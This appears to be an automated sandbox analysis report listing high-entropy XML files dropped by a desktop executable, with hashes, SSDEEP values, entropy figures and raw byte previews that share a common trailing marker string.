          MD5:0394EE2FB3E43AD438AED642FCA27F43
          SHA1:D946FE72ED28BE4EA49026791A9D2AB634BB76E8
          SHA-256:640B7F7E27C1273A63639DC9F1AD7BE0BBFF42229DFCBF3CE828B36F70F08847
          SHA-512:0E06047135F7B6B3BAB2714E6B64496E5E78CE4601A264DE970BDB9741C6A2C1846C668C175B7454E45299D30C61FAC8A9960D4208BD7364CC882E13ED6361E6
          Malicious:false
          Preview:<?xml......xP.:d.j.s..|.7..6L@$....A=.....#...5....m.4/T.\.....q..j..*.h......!.B]..#C.;a....z.....T1...!..|.U{.....t<...R....)c.B.Ofo,....p..m(.....C.....>8.....<..H..@qI..Z.,.F.n...csa.>.=d.l..VI...K...m{-..z*(^.TQz..76N.p...WO..|)Z..f8...y..'...j..-JuE.Y..%..P..F.r..q.a...lc....M..._.P|....ny......T...G..9>.c3iUn.6.....,..8....m*yQR...q\.,b.s..........*......r..S..<....-...!.....\....5..I..G.......)..z.?-..{u,J...C...pK\8..wY...||[...Te.W.3.4'X/....."|.F4.g.~b.t!....|.'.(dc..P!...{...y.(j.sS....\....... .-..a..F.U,.....q.lcw1......PmJ...C.j..A=)|O......XD.x..t!.0:.y.(eF~Z4...:.ER..Xe.+..I........5..Wn^i.e.l..O...........8....1r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):812
          Entropy (8bit):7.753012904063691
          Encrypted:false
          SSDEEP:24:7P/OWNhbQ33CsSf8dHw3lSEXgXj5JxM6wiTkbD:7P/3NO3CPgHMwEXgXTJiD
          MD5:A30478EC29FD43B8398DC84A79B3CA81
          SHA1:675FD7A3A317619CBA51C83ED9E2BE5C3C684986
          SHA-256:4DFC25BE365A83824E7F897CB77F41B7AE27FC9E29E57A03E4EECD432EF5C6EC
          SHA-512:013E005E7068B0C59BCA819BE986B58868FFB9140826361C884B476D4E319C2032AD89098C3708C47EB36CBD723C13B3E9ADF7339AF5ABDB5E222E23CC6AF834
          Malicious:false
          Preview:<?xml<I......>E....t._R'..%...c^...p&..+I...@M..@.[.%.~......&..T.Lt.$..[...C.H....h..}.N.)......<E._Iq*b,.......6....@RU...........i.K.P.oy.JW...O7.....A.....@..|k...."z...5..p.A........z..{I.I...aW.jm.....g..4..../...V........4_.....r...^~..N5...<.u..p..z.....y. ..l...'..aYsS..s...$..,.H^..|s.R....3..._3,....#)....Wg.5..wn.R..MS.v.6f;.C....fq..v....j.....;9...YG.?....K.@).\.T.s#..R.r......`.&.Z...VO....._.....?..6...pvM..$1T[a..wJf........t9......u.2_...`...olLFd.kJ..F.:T.. p...@..)..%.......Sq..0. (j.vU...e.....ba.UN.8y.....H...4.7..S...<E.L.v"|)..'...{rP...'m>.k..Sk.....i)f..n.s...xO..<....c......T..8....4.X?+....#,-...}."H.............._.....Mg.....v.v...|cF.;.A.D.|n./.y.B...#.9u...tr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):748
          Entropy (8bit):7.650026486137832
          Encrypted:false
          SSDEEP:12:guuhZXdqqdbXnRGIJZHu5zUnAuKQZZccNYyjZx5I31x4lKp3DiXYFeXChn/mP9iq:ru/tHnA0ZHu5zxFqVah74YpTiX6mo/m7
          MD5:44D2C3C0DA5E43CFFCDFD60E60CF6343
          SHA1:79913C5BFC2468A0EF11490479DF7599F74B273A
          SHA-256:1A8D6DEA66C7576E79035D595ACB9DE074DB6F8806FCD40D58EE5163E23FD704
          SHA-512:8F697EFD7F53EEC65F248FF19D96F2F9AB272A89963B5654A7819A69D9F1EDEA7A858F0CDD817E34E51629F0483043135B5000FF3F6B3D5B3FBF2A2ACD894E15
          Malicious:false
          Preview:<?xml.o5.K.....G.....T........i..Z.<...5.)...Y..>E....N2yE......w..o.Q....L.l[[.......,B#....iH>...r.z..#__C$D<~.....t.w..J.!....xf~.T.w.y....2...>......o.....r........v..'..._g.3..n...X.L....f}.s.9p..7..nY.3v..z..Y.K^.0..0&....Z.z..........0..o.d._..:.f.Z.&..!tg9.Kk.#.y....w\r."._5....5.%..4.d......IL....!.B...8..,_..I.-?.|.U#...O.nD..0....2Y..vz....x..P.n.......NT.?......$XY.}..wQ /...N...M^!5.eG...6...A8.>5.{_....{.H...j..c-.e.m.Q9..O..I..k.*...K..,..x..u..%....?.e../...$.?3..y...X....7....!.....@>.W.r.G..[u3....[A....;.z..h2.v....1.,I.ILkA...d..W..e...~.j...r"q.]..2....L..Ea..,..B.'.0..U.<....f%.......j]}^Fy...Cx4....Ezr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):804
          Entropy (8bit):7.716995841914023
          Encrypted:false
          SSDEEP:24:1NI/JxL+v6Qn6ufP7u9OlYYK5v+MvcmRh/uiTkbD:1QL+v6e6uH7qOlA5UmRh/LiD
          MD5:B29B13738CC857CD29EF56C75FEC39F9
          SHA1:86EF2BBF588DB8E6FFFAC01E74A89302D421E2B2
          SHA-256:39BA269A8EAEB3620744DADD8DD4E4B02F138967B4313B6A02DC4417B07E99B1
          SHA-512:3C97CF380A3FCA3A99E69E5E2D580FD768FBCB67245C72994C46A28FE95D5ED10AA828399F713BF9145C2BCC0D8DCDB2838635E508C7B52BBF230F960C0DE117
          Malicious:false
          Preview:<?xml.....h.7.....U+.n...;.:.e2.lH.o.\p.g.W3.n4a..........-.Y3Z-2W.b..}....x.3.}.qQ<...cO.h..D..>4F3.n...{|._U..T.pK.....:.....QR..Aj........sgl..!..[....>.8.....^.p......>...d..79#..v.W.......\0..D..N.7(.....Rp*.T..#.!J./._Y.Fj..q..p.#.#9.<.....z...`....^KQ.x...8.G...+..N..<.|..S..t.SrAp.......#....\C.h....Te.h.D..}t.......*7F.SEp...n.0......Gt3-...LLGm{G..[.N!.yJ..8x.H.(....N.,04..{.p..4.).(....(...-.o.e3Tk:..k0q..p.....D..2....'.B.....[..I..(...R. ..pd.o......C...q..$8......6.^.d....y,"a.P..."..Q...R\..~x.. .%CTtY...Eo...=V}.....^e..+o...#...Tl..^X..0Vu.....UU.......vR...../..&q...[."..f.V...H...(>.....J.w.Ji.\...(>i..3....n.ct..qI...c...h..@....`....8..n..d..[a... .ZV,.q3Z..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):752
          Entropy (8bit):7.690116931855928
          Encrypted:false
          SSDEEP:12:qMtSvNcIWrG/GC67papJKvXP96Q0asDwTOJOMuhDVY4Mg9yFyFY/h36xPLNixpZE:dSvZWBkKvX70wOYMuhDRt9yFf361NiTW
          MD5:4AFF1DA51250CE487DBC330376FB7561
          SHA1:69AC4A357A815307F6B10350FCD4C14200CA66DA
          SHA-256:D55EA6826DFA5F2BD41A187D7702391A3050345F4ED66CCB596FACF8E5E339AB
          SHA-512:0E716E8A3AC47AC50FD796344382479D207851226104E391533AB5B74273928EAD5C1A160DC03556E1226A4122B99E94966C1A9CD91CBEF2B1C0D606069B5B94
          Malicious:false
          Preview:<?xml.CL.;....}.9M...v4.'.?.%..O.#.tg...64!.......9.7..JH..K.v...l.a.Z$$*...q`.\...|.U......c31..p,...c.lsS....Vs.`./.w.3.$*rs..E.m .23..'.........A...6X.=G...j...l....q...5^Z2..+..Q:}D../=[.^.rh.D.w..'u.s.Z..%>..8.j.=.2.2f.$...|..IBH..B...o].<..@vPq?d...A.....kslaUW......q.w...e.....z..^..)..a/..HVo...o.#u.AS.T...4.=...&..,`..+O8&.).T..FPiDf9....[....}....s\,..%.<|.+j...F.TTf.t.u...=)N.Hjc...I}24e.....D%I..E..~xy.l.....i..*...7.)HBt..V...&9.(/.....;Z...6.*..&G]..j8....oi.. /@N@...fZ.#|Q..{i.j..F.\A|....WN.z...-.d..$.S.D.....%z\.?..+...O.eZ........>gh..)..W[....G;b...7..bqyh"...&aS..$....r..X.......f{{\v....r.xJuz^y.`D..M.W1g..m.n.Wr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):810
          Entropy (8bit):7.7349479523242515
          Encrypted:false
          SSDEEP:24:9XWH30Hq95KHfh6JsIVBovOxL3xrH8+8aZiTkbD:9ziuBosOx5c7ziD
          MD5:F87A567922492BB0271A7F392610CDD7
          SHA1:2B75D0EF367FB65C4B612C8253D1385FD4D180AC
          SHA-256:8A8705A2C678E1FF36C587DDB210C8FB6881EC46688650C83269F9B39FF04DD4
          SHA-512:4EA188013AB474FB7E6888EBBC809F322CF31FE4EB7A2A070AA8E6C04BAC666B7FD310CAC230F500B1B51C92D140E60F0663E6CB19C63B0CEC1BA09708E24FDD
          Malicious:false
          Preview:<?xml<....H.?.u.P..R......1&.iN.I.jJO,.k...y.W]...8.%z.&..d..@....q..c...e.E....!.ax.......K....PSU.]./c.+}...@.uZ..$o...]....E..Z.p....f......8P..Y..........[..g........E.Gwm...icA......RD.....I..m/b.JD.....^.@'b...dZ|v.6W2..BT.t_..*D...8 e.F..'*._...[......0@...-.J^....k.....9.p\..........}(.Li(i..ps..~.jk.I_..h.......,{..b......r+.....v..?.ffn..eI.//...Gh....rQf.......R..`..nqG..Z.?zM.iP..*.....+...!...%F..|.S..[.. >...D..G...$n.t...<..K..r....3Z.e%L..#E.1D..X..zx.s..f..W..B6..s.k..../_9u.#.>.p.A.YU.`.."0..]...Q...I;...l...x.........5....N[..*#H.../.G....4..e.+7.-.....[f.R..Y..?7Li.V._~>t.Q....L.^..o....T......^.nPyc...!`.M....K.N...kD..J.D....6i=.G..>.../.X.G/..*.$.c..5..P...CJ.b.H..YUD.}r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):752
          Entropy (8bit):7.710189140224116
          Encrypted:false
          SSDEEP:12:dj4tjMRjfsgnJmHatawgbDL9vuYFukW6r1K5r8UmDfc0QmH1ktX++whKfixpZacq:dj4tGsgnJbtawCvuBh605rpuk0FOtCwd
          MD5:AFE023BA6B81A19F3E6F4D9B3477A87E
          SHA1:FCE44D758FE80FD8EB7309FE5121216A442A5FDA
          SHA-256:5DBDCA1BFEAE80129F7DA5AA6C4899D2ED8DD80771D9540AD26AC3B3980A8BFB
          SHA-512:B7FCA3CEB916BFB5849593C39C99CCD30274A0105AEC9FA7F989AD4C3A81E832275943E42A10BBB6D183D0939C5EDAAA79DBCC47350367B416B737BBA97CBA33
          Malicious:false
          Preview:<?xml.^Q..%@.?~.....,c5Y...=2..$..E.3.m...u9#..j.V:4...E......VS..M....)5s[d...I..T...3..x$).P..Hu.....M.L...I.....[.t.d\g...J....;...U...b.S"b.m....CJE}...?N.L.nB..k..]..m8z..S.1D..?(Q@.,re.G=...EH6r8.T.KddtU.Gs.z.<...w.a...^|../c..d......7.\.W....$r.hu..-.iH2..6..K./o....?.R...E....*(.hM...1.q.H.....T....iv.....F).$..o..1.....@...p!^.'K+...>,.}+w...?.u.{.GK..d...cn......v...3..n..":.x.....>@>w...m.0.)..M.u..W..<....N.5..y....a.M...!..!..i..=r.B.n..[...8.C.....RFT..&...F...j>wh...)..3S..........9...I..wC...*.Z..?..7j.."..|..{p_&....,..6F.b..<..B.A.8.+e|....>.'.w..E=.....D..p...~1/..M..g.HJ.A.0...7...@...{....=.....f(..l....wj...}q.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):810
          Entropy (8bit):7.721068145625983
          Encrypted:false
          SSDEEP:24:Gf8Tm1azRen+UnX4gHFEdnsbmdy7iTkbD:E8fReDXXHan6m4uiD
          MD5:834D77D74FB05D6E39EDB5B95F0DAE4D
          SHA1:A9331095E818CF5872487C273C6CC77C65C03A94
          SHA-256:CAC9E0AA25EEB669BBF634EAF1297DB3FA1C8DDB1762DF495AA949949637EE3F
          SHA-512:562BC4E4D361E2483689407640A28AC8FFAE6B5F130BB7126D706B42FA3EC8FDFD46E6F6750850D862BAE13EE624AB79B792D0CE417E8FA93DF8BA00D7506087
          Malicious:false
          Preview:<?xml|pq....S........|0..v...&.rI.I.k.k&R....E_..i1..f...h...m..5.....Yp...[El.)..s... 6.....O.....Iy...&.v*...m.N>n.:.....y.~.j....i..JxR.Z...._;........r..8.$.Z.Z\.4..K#......D...D.t...Z.......*...iU...,.j.Rd.uQX.[.........NT.5.....$.._}..\......Q.M.qaM7..}. q..!..Q.0..x^.#..s...|?..&0.c.x.9..R..A...p. -.0.{1....j.c.I.\.:GT.......r.....O./.. .B ..%.../.:.>{g.......]..da....8... ..S.=#......x.............q.}..de...sO2!...) .J~O.....UQt....}y...Nl...?Y..S.<..Y..0....$....WQl.3.np.mn.}6O".....m......oh.......1.......K......|..*fC..q....D....%.+.#.....]B.D...H-.8$_9......L.j>J..>......[WU..r+}...Z.V-h.zd+.."T6.D.g.D..$..)....KX..,SSk7...Z...8.p#..?"..e.E...Ub....T..!.hNI......v.b.w.nr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):752
          Entropy (8bit):7.721727273325434
          Encrypted:false
          SSDEEP:12:J0TH2IQSudcaKh1Kb66VvO/rp5x+3erBXJgd+Imaer3tdKWI4YU+cgxCsJESixpW:J6nQSpTKbrvODpd/qVsry54CcUC0ESiq
          MD5:7A477182A4AE9C4380F41241A5F58683
          SHA1:A58D40154E4F0559564288402AE5C0DFA28B0D39
          SHA-256:E084BF799380B18A7DDA4E0C46A2AF547FAA67683CE64640253182E54D9CAE67
          SHA-512:FFB8652E6BBE3FEC0F304A07DD169E7AE7D833E445B2C7580FB3C3F178EDA02269E152E23CFF42068EBD87DDC4EF087BE7F56CB27AC171E413ECD1D71CEBABF1
          Malicious:false
          Preview:<?xml.d..A}|I.`....?......0..m.k.].=.[zQ..p....=.j0..b=...t.Q...a..,!.....2.!j... .$.....".CH7..B3..c)...%NX=,.....>..|.....l.Q.0....<.k../.H{#.....' Z...z......n.'.....t.^%..DA.........OCu..y....BL.....PK.v...eQA.....<.}Y...'..9.....X.m2..<........|.-.,..J>[..#...q>..d..Z.|d9.\d.gq.e........."V.t.p.q.,.l..<_=-n\j&..;ms..*.......?........l.....W......*8...x.....BP....?..y......,bJ...........*....N...sQ%.....[.*...u...Kr.5#..}..e..Z.">~?..l..].......{.9:.y....r.........j.._}.N.#../.a6..93(..II%.QW\&...pY ...P.....<..[NXS......`..{y.f=GVv&)N.......a..b!c-...<...........u.UT...I.d\....YB..X..u.AJ5..UO....q..,]..|8J.G.d.&A.2W+.P(.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):805
          Entropy (8bit):7.714696106173858
          Encrypted:false
          SSDEEP:12:DlAZCPtMGr3LUf4tz3damxetx137cimkAa1RY6byVCSt2IixpZacii9a:hF1Zjwf49Qmxi37cimO11s5iTkbD
          MD5:3E134677FCAE2C436D818E678C364175
          SHA1:BEA9BF51DAAA083DD7CA42F4D37586C338AFE79B
          SHA-256:DB32C94A5ADEF4849B36EAD76970D45EFB76FBAE5FF51E717D335317C9950342
          SHA-512:FE0D142E4CFFF1D44F7CAE84FD92ABF396C11E1E08FBD9E12D312FCE742D8C1E63385695664B67266F2DCA5BA54BD3537450EAC07F8BC40B5FEBCDC08F9CF8E9
          Malicious:false
          Preview:<?xml.f.1c.5&.V..........wA...!....=.b.sFv.-../U....o.~.B.T.[.8....'.A[c.n........Az.4....u.-."..'...t....>..Xm........F.T@.g.x,C{n..vV..;.%.h...;./..N8..#...PtzO.....)...c.I.l..aO:.Rr....R.:-...L.A.jh."|.H.....B.Y.|.....8..}H...!.v..S.,..f.x&.ye....X4......r..fk.....2.?.7Io.jlF....^2...+.....w....f.B...`.s.~..H...5V..K]L.....-.*.#..+.A.K...@6.>Em%....1.`EsI...o.}.._..+.^....nc.Y..[.gC..Z....C..f2......RK<.....-.._>H.0u....+.=.,xD.....`...h........:X......5...b..t..v.zR.i...>x!..0.+?...Z..... .#"....X.{..d...8.F5.{Z.Li_]c.a.].c..U....c.I...Es..j.G3.b.9....+d...!.R..y `.\,.{..,...6 I.....].Xm....S..'<.....Sm....[N...a.>......#o..0".u.Rj3.~..k.Q.)y."...#....dX....3B.......@#...#.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):801
          Entropy (8bit):7.696132494191883
          Encrypted:false
          SSDEEP:24:3WvCyuYeAueurJawR8cczyiQaz1NgLiTkbD:PT7Afa8DzHz1NgeiD
          MD5:B66B06B3490679974AAE927231F48CE5
          SHA1:8DB4D31B365E20BF369C640DA869915F450C964C
          SHA-256:1BAD05344CCDBF362B75CC0C2203BFB4111A1ADA0949BFAAD45C6B9E3EB6D92C
          SHA-512:BD5054FD158278D7E72719E01E18A91BE082F263CC7EB7B5AC69DDDF226A18B91F31233E2C23A39183E4BF129FDBF36B9E3BA045EB271FA30EE21431CA65A136
          Malicious:false
          Preview:<?xml.}M...0..^`............&....*I...w67})....`9/....=M...6.WF.{Y...J...;.&.[......r...Vs...6_....."..^.Br.....Gt@...`. )M.YC.v..'.laA.........U....Lo.....l..7L..M.u.....gD.p:.R{...I...NF....'`u$.!.B.U...OajM....6..=\.em! .-............cQ8k9X.........Kn...`.s.._$.k..>.vY.bk.8.....F..6..nj.A..<..B..CF.46....0aY...i..>.#..emIG....R...8n!.F.....N6C..i.t....AB.o..q.je.........\..DI.w...c'..\..*.X.g..CI..5Z5....L...D..K...O...;.=.Y;..J.'.....v.'..o..t.~.8.FF..*.N.6$G..6...a.>....w.6.|....v...c/."@......$g|(aZ......:V.....u...(.D.FW.G...S.v......_.>...(....)(n[.R..-...j......J4.!d.F~....w..PH.$K0..0.y..y8;3.0....t.==.Op<o.>h;....=....Bnm5.fO..B.AH..O.+.....^.J..THl...X.4.7..d..Gr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):818
          Entropy (8bit):7.770725377621414
          Encrypted:false
          SSDEEP:12:deRQWzosK9A1IdwWg/Z/8juCd972Pr2Bj/mSPrlG/81M0icgvC6tZF7sixpZaciD:CK9qWKZ/Yn2T2BTb63vC6toiTkbD
          MD5:507916A37851AC85B5179A1ED18A8806
          SHA1:8F5FE317A8AD8C2DA4C06B43EDF3CECE351BA528
          SHA-256:BE06AB123EAA2F6D485B852A16343EADFAD1A59FE73A5FD24A8A752844BE8FF3
          SHA-512:828A96AC39DE167C6B1703C96F2AB55C8EB197D54475A399C9D40B2D916428B9373873456AEC9625340E2FECEB174D61B5325E1EFEF6C2DEE85281075F15AAAA
          Malicious:false
          Preview:<?xmlN....B..K.....E..&.N..:...{...1*..1yM"........`.V..w$.[.k.T...7.b_.\...#...}.>...K ..X.X..$..p&..wT..2m..........E..t.....i^..$V.u1..........'l...OPQ.T.n.."..7;i.<...>.T..h......8O...?(b%.....z.6y..h.1/.b.3.].....R.d.<.}..i4...=P.Mt`...nlY.zGM\...-Q%....^v.,.I[t..Mt1lIK.V..{y..'o.Od.E#.....J_.Z|@Nn_.......*.H?:..y.......qjI.j.9.....& .+...>*-S..Ds.`....`........!.......Qy#:...!....=_.Z...2.dq....%.D.F..7;h.....{....&.7$.rZ.y.|.l.<...~.F.b.z.@..z."u4:p...sN.W......s..:..8.....]!:U.$.C3.Z. .Q0.'fs..`..L%..s.d.W..xf.9c<.......e.&...',........J./..-.y.....%.g..._F$].D.?k...8@`..L...VH...1..,.!.....o%Ik'.$./d.3p3..ew.....q<K....oN=D#.E...fS=......Y..T.S9r.....1...}0.)..[..${.Q....m...'S.\.. ..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):744
          Entropy (8bit):7.7240440470180545
          Encrypted:false
          SSDEEP:12:JxM8v+GpK7oqVsIFNDS7eOjF2wb8wreb2EzL/t84rJyReoQ6RvILGr9VHHyq/ixU:Jb+tplwys2wbhgbHl8YWeo1RQC5V//iq
          MD5:FF39281DB713BDEA122A0345FCBDE786
          SHA1:495A86D31379E144B73FD36C85EFAAEC4573C43C
          SHA-256:D20F7596DC8A99E337880E930C23D50C58BA1DCFEAAD92A115FA5BD36CE5FA76
          SHA-512:ECFCC517E21EBD8E9760B2FF4F945EB5307E6B3D3F830341B38119A36099104C5A0534CE600C21E15235032A0E4370148E4B95727F858C28A154E79BB7423B37
          Malicious:false
          Preview:<?xml..F%..,3....z#c....m._+(..m.....<....zn...s.;....(...z......&...`...u^-.....S..Fu...f.0.,.......Ap.z.e.0..|.....IY!.B.&.`.2N.....F>.......@.....ip.?.....m....C....?0y=....:.rM.J.>.Z.)mO...^.l8.O.y..I..[...+o......Y<.@3|;.k... Cj..L...k....R.[|..b....?......U:....p....*'....,....t..a8PeJ^....>.g,w~...|.....~`....&.k.M.V...r..O.....5Z.....X.....}......y.^.V...QKZ2.....<.H..c;$.<0ma..[.......c.....M]:.^L.......\.....A...q..k.._M......6m.v.7.....c.H..`.u....\.7.'[k.}....X..c...%.mt^Aj.C8.e.P!.C-.....K.....6Kf...+sl.....eF.$.."..4.%>I.T..L.C..$.....O..6..b.H....!l.]3...O..PR...?...d..+.z.Y_..bHgav...'e.h..N6#+.m(q...L.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):803
          Entropy (8bit):7.714890702916759
          Encrypted:false
          SSDEEP:24:rChi72B0xmMK++34P+4SXGkSpTzVeoZfZ9LEbgjiTkbD:rCa2B0dKD3rYFeuZ+8WiD
          MD5:F1A5C5008E1452967F55DC72D95290FC
          SHA1:220E8E8E6EDD0A0724F343B2FC3FC0CA250A3F43
          SHA-256:A7C03A4F04472360BF75C5DC6913B20A074ADE52857A1B099C51D7DD4EE1EC8F
          SHA-512:96D4799FB7144B5860B767D004DA5117EF7CF519DBE2FD43406717C1A772FD7CE7EFF05766A795E59C996B4EA8E5C932645C4FE9527C91D9D8A9A29452D8AF29
          Malicious:false
          Preview:<?xml....RS..$...r.~.<.q.E......[oZ....z:.kn..7.nG.?..G..?4~..'$.v.Y.D)....2*&.t..K.Cn.t... ..O.{9rq.....b=f|.?..8b.Hx...w.}=B.....#.}H..... .jT..hq.......H.......z......p.~.....O..\].P.E.V..$=..R.v..q...+.\q....^.......n.....[.H..Cz#p34.t......z....B.\..:......b.....8NGkk...U.......,.Cw.R.,.BX.U........m.2e..].....m2...I`.j......O.-Z..Ph.ay.D.i.'.@.Z{.N.8GF-..WZQ.......h.&-}....v..M.Ps......o..../..3......w.<X.....uH.=.=S........3.f.y...[..c...k.......G]...@......26..P.b1]..ED.{...<..3........X.2\Z......h%H..KT`.H.x.X........:.69..3..8.....#.j....~\h.(5.:..(.s[.&.d.!....#.i..z...R....\..G.o..&X0..]h...I../..{..l..h=.?....X.!S.9&...".....z..sc..."......&D<....q..&.NT..s:.'Qbr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):760
          Entropy (8bit):7.709846211727297
          Encrypted:false
          SSDEEP:12:DPq8W2yohpfuZseSfmTJqg3ZiB44s/sxO2BZyThe6Kk/LGc126K018Lc661mV9AC:DiD2yohpfuZseSOTbJsns0xO2BMThe6g
          MD5:D71CC46281C67A5479B0A7A0D4676E93
          SHA1:2E5BAB1CC07FC9E991F386FE5CF8383DF1367889
          SHA-256:962B2BA27DB9D551126A380F2381AFC4698D5DBDD20CF3828AB90F9E79FAF717
          SHA-512:0D3402D568959A2985FD702EEB45F32C855BA34992EC109640C05996E2F18420B4D5625798B2AAB8A7BE47A80643B0EA315E18BCAFAF58F280933558C383475C
          Malicious:false
          Preview:<?xml..P...oU....h..8.x9C.Ox.H..........m...".w...U_.s.Fg.w.W.7%......:.....V....g-.........t...b....:.X.2.W..#..&2.G.........J.c....}\..#.p.4?...h.._....L0D.O.".0.a.T../..;..o.Ks..t..7..*..q.Zp..T\....f../.RojhX.....a..C.?..Fb....?.}|.j.{B.......::.J"..I?d1\..g.f.7.>.......Q..."..H....sH.M........z........%..q..m6.!......a........{1...$<.#D.L.U(..S......?O..^...?....m2x..m..l.8).....C..g.e@4|..9.W...mI..H.L@..i....q..,.....N..q...."%.t..S.... _.wh......m..bnp.gZ.f.=... ..u...e..k..()x(._.x.2.yW.>0.....g.W.(.v..:..pl.....f9.5rh......p.".6..^.y.Q..&....C..eG-...<b......N....!%..@.3. ......."...%_....._."\B...gQ.;.!o.6..[@5ZN....@.5...N..T.T..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):835
          Entropy (8bit):7.781188892465341
          Encrypted:false
          SSDEEP:12:1JX4OVxw2asxRnvLvtR74SHuouZSlzFWwCDLnGgTpR5zAz++Mzd8UjMOVixpZacq:AOV3aIBvtSUuZSlzFWwCDT2MZ8OiTkbD
          MD5:DD0753B5F3C8AA067394CD26D0BC6DBF
          SHA1:63DFC92A1ABB41DF3D8D480971AAF74913E26274
          SHA-256:797D0578EADC74748E48BD339A28077D2CD75802A56B1497B726D01A14F50555
          SHA-512:C8BA455E94C3984955AF790943CE18EC90C197F2E1C14A8A55FC9F91B82F78D5E97CACFB9BDE7470A9D3A948B80FFB23F7A5A78C2750AC2C821A5DCDCB9CC49B
          Malicious:false
          Preview:<?xml7.m."f.|..*..)/.k..3u.O....T.D.?R...F...p.V"At....K'......i..........F..D.`..D.a.. >.=.+. ...S>.t...W.....o.n...S....V..8~M..~Q...(.T.jSJ..4y.......b#k.&1?......E.........l...p...tAo..\O.8.]..8E..*)..AS.....V."...6..M.....T.N....rs.C.QU..c.S.....6,.n......5\.r..}#........70..z.9....x...J.d.Y......w..... M.v.RS;.]...=..........R.jy.<.....Ra..'...'.........e.u.%..e.....X .....$,.".E...)iR.B....W..|H...Mh..Jz.....@.....k<"{.//1M^O.&....(....:.Y[3.9........!.7U.$Z->@....'.....BK./.2:.q....dD.9.r........gG..r..g..:.......d...}.{`. ..A.[..$rnIr.<.;....{..q...G...g..!.K4..V..oD.?b...&*h./.V.h.%].I.'.....h..l#....^.65....[....N\...T..O..ap.. s?.5{.....!..l.F.-...Zk...r........^....... v.x...AN...~..u....jmJK..K..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):740
          Entropy (8bit):7.7012255736633
          Encrypted:false
          SSDEEP:12:Mron6/tcZA7bTdgBOG+3Tb3nauAgaXD0YSu+/Wi/hKHKQT8DP6BcixpZacii9a:r6t62fdEOxzz4EPpzvP6BciTkbD
          MD5:4D74B98C973BB55E7503F47FD8CEB858
          SHA1:31BABFAC6150B1885E1B116AAE167DDF0CED8BA4
          SHA-256:86185FD60A99135539A9AA9FB4930A3F7DF6ABB95B34A7B0CF45EA3FB73EC554
          SHA-512:5FD66EC3E1E55F67CA02476E7A3C1AF1CF9EAB77F6ED693BF8B6E099C2CCE78EB5D1F8E544058B0943504D610E6BBC1DC0677D1F2E2287B2AAB40816E6FBB867
          Malicious:false
